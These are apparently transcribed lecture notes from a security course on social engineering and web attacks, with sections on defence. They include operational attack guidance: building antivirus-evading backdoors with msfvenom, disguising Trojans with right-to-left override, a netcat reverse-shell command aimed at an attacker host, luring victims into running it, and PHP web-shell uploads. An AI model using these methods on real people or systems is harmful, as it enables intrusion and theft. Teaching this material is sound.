Lecture 5-1.txt

Full Transcript

social engineering attack process

Information gathering: Engage with targets to gather useful information
about them or their organisations, colleagues and families, etc. You can
get information about the company's employees by going to the
organisation's website. There, you can identify the employees and get
their contact information. One other way is by physically engaging with
a target by going to a corporate events and parties, etc. Social media
can also be a good source of information on employees.

identifying vulnerable individuals: a suitable insider needs to be
selected. Someone who is important enough to have access to some
valuable resources and information, but not so senior that they will be
closely monitored. Targets of interest could include the CIO (Chief
Information Officer), CSO (Chief Security Officer), Director of IT, CFO,
Director of HR, perhaps "Sysadmin".

Planning the attack: the attack could be either personally or remotely.
A suitable method should be chosen. For example, if the target is known
to be likely to click any links sent by email, then phishing email would
be an effective approach. The plan often needs other social engineering
skills such as natural charisma, a good phone voice, an ability to
convincingly discuss a wide variety of topics and physical appearance
(in any face-to-face attacks).

Execution: The planned attack should be carried out with confidence and
patience to observe and assess the results of target exploitation.
Depending on the level of complexity to perform the attack, other
technical apparatuses like fake websites and malware may need to be
arranged.

social engineering attack vectors

Phishing: try to get credentials by pretending to be an trustworthy
entity. Spear phishing: phishing attacks that are directed to specific
individuals or companies; Attackers may gather personal information
about their target to increase their probability of success.

Vishing: phishing using phone calls.

Smishing: phishing using sms.

Baiting: real world trojan horse, relies on the curiosity or greed of
the victim to be executed. For example, an attacker may create a disk
featuring a corporate logo, available from the target's website, and
label it "Promotion Result 2019 -- Human Resources". The attacker then
leaves the disk somewhere in the target company, which could attract
some employees' attention. Once the disk is connected to the device, it
installs malware to steal information or gain unauthorized access.

quid pro quo: something for something. An attacker calls random numbers
at a company, claiming to be calling back from technical support.
Eventually this person will hit someone with a legitimate problem,
grateful that someone is calling back to help them. The attacker will
"help" solve the problem and, in the process, have the user type
commands that give the attacker access or launch malware.

Protection against Social Engineering

From organization's perspective: -Create various rules of access control
in such a way that employees only have access to some but not all levels
of information; the information is disseminated purely on a need-to-
know basis. -Establish an ID system where all employees, independent
contractors, and consultants are issued with IDs when hired or
collaborated. Make sure that all employees, contractors and consultants
who do not work for the organization any more return their user IDs and
credentials. -Take immediate action whenever suspicious activities and
security breaches are noted. -Take good care of private and proprietary
information. -Anyone who visits the premises should be accompanied by an
official representative or authorized person from the organization.
-Enforce individuals to change passwords on a regular basis. -Create a
culture of taking the issue of security awareness and training seriously
-- it is not an expense, but an investment. -Establish an awareness
program for individuals.

From individual's perspective: -do not share private information with
people on social media. Social engineers will try to approach
unsuspecting victims through friend and connection requests on Facebook
or LinkedIn. -Do not reveal your passwords to anyone. -Do not click on
any unsolicited email that contains links that lead to web pages which
request for personal information. -Do not open email attachments that
come from strange addresses. -Do not allow strangers to connect to your
wireless network A hacker can easily put malware, or a network analyzer
into your system.

------------------------------------------------------------------------

three tiers of a database-driven web application: presentation tier is
what the users see. Logic tier receives service requests from the
presentation tier, execute the script from the data tier and send the
result back to the presentation tier. Data tier returns data to the
logic tier.

Preventing SQL attacks: Blacklisting involves creating a list of known
dangerous patterns, characters, or commands that should be blocked. For
example, if you know that certain SQL keywords like "UNION" are commonly
used in SQL injection attacks, you can block these keywords from being
used in input fields on your website. Whitelisting is the opposite
approach. Instead of listing what should be blocked, you define a list
of safe or allowed operations, inputs, or characters. For example, if
you have an input field that only needs to accept numbers, you can
whitelist numerical characters and reject anything else. Give users very
limited privilege to execute.

How to make a backdoor Trojan effectively: ü The Trojan should look like
a legitimate file that does not arouse suspicion: Users usually are not
suspicious of non-executable files. ü Social engineering should be
conducted to lure targets: For example, the Trojan may be a picture, pdf
or a small app that the target is interested in.

A Trojan backdoor is a type of malicious software (malware) that appears
to be a legitimate program or file but actually contains harmful code.
Once installed, it allows unauthorized access to a user's computer or
network, effectively creating a "backdoor" for attackers.

Trojan production in practice: 1. Make a backdoor using tools like
msfvenom or veil evasion. Make sure that the backdoor is not detected by
current ani-virus scanning programs. 2. Using a script language, combine
the backdoor with other apps like picture viewer, pdf viewer, small
utility apps such as a calculator or a game console. 3. Compile the
resulting file to and change the file extension if possible. 4. Deliver
the Trojan to the target.

Thanks to user awareness programs, it is known widely that a file that
has a.exe extension is dangerous and should not be clicked. So it has
been a common practice for an attacker to change the file format of
Trojan to jpg or pdf. For example, use right-to-left override to change
"abcgpj.exe" to "abcexe.jpg" or "abcfdp.exe" to "abcexe.pdf". This
method is clever but turns out to be effective in some situation but
careful users might notice exe in the file name. Hiding file extension
has limitations and it would be more effective to lure users to install
executable somehow.

A simple Linux/Unix backdoor A reverse shell can be constructed using a
simple Unix command: ü On the attacker's machine: nc -l -p 8080 ü On the
target's (client's) machine: bash --i \>& /dev/tcp/\[AttackerIP\]/8080
0\>&1 Social engineering to lure a victim to enter the above Bash
command Ø Quid Pro Quo method can be used. Ø Phishing emails can be
used.

Setting up fake websites Ø This will lure users to enter their user
names and passwords to a fake site set up by an attacker as a popular
website. Ø The fake site should look very similar or identical to the
original site so that users do not find anything suspicious. Ø Usually,
upon receiving the target's username and password, the fake website
sends an error message, which looks benign.

Damn Vulnerable Web Application is a web server which has been made
vulnerable for web penetration testing.

File upload vulnerability: Attacker uploads any executable files such as
php (PHP) files to a vulnerable website.

Basic steps ØGenerate a PHP code which will serve as a backdoor. ØUpload
the backdoor to the vulnerable server. ØEstablish a connection.
ØExploit.

Weevely: A PHP backdoor generation tool in Kali. A tool that can creates
a PHP backdoor for stealthy web shell.

Command execution vulnerability ØAttackers are allowed to execute OS
commands on the target web server. ØCode execution vulnerability can be
used to obtain a reverse shell by making the target server connect to
the attacker's machine. ØCode execution vulnerability can be used to
upload any file (using wget command).